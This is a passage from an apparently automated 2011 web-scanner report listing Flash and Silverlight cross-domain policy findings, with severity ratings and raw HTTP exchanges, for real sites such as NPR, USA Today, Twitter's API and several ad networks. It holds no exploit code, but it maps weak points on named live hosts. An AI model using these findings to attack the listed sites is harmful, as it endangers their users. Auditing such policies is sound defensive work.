Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:46 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Thu, 07 Apr 2011 20:17:23 GMT
Accept-Ranges: bytes
Content-Length: 455
Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:49:46 GMT
Keep-Alive: timeout=10, max=4945
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
   <allow-access-from domain="*.iheartnpr.org" />
   <allow-access-from domain="apps.facebook.com" />
...[SNIP]...

3.80. http://www.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.81. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Set-Cookie: k=173.193.214.243.1304955581869571; path=/; expires=Mon, 16-May-11 15:39:41 GMT; domain=.twitter.com
Cache-Control: max-age=1800
Expires: Mon, 09 May 2011 16:09:41 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:11e6"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://content.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: contextweb.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.7. http://data.usatoday.net/clientaccesspolicy.xml  previous  next

Summary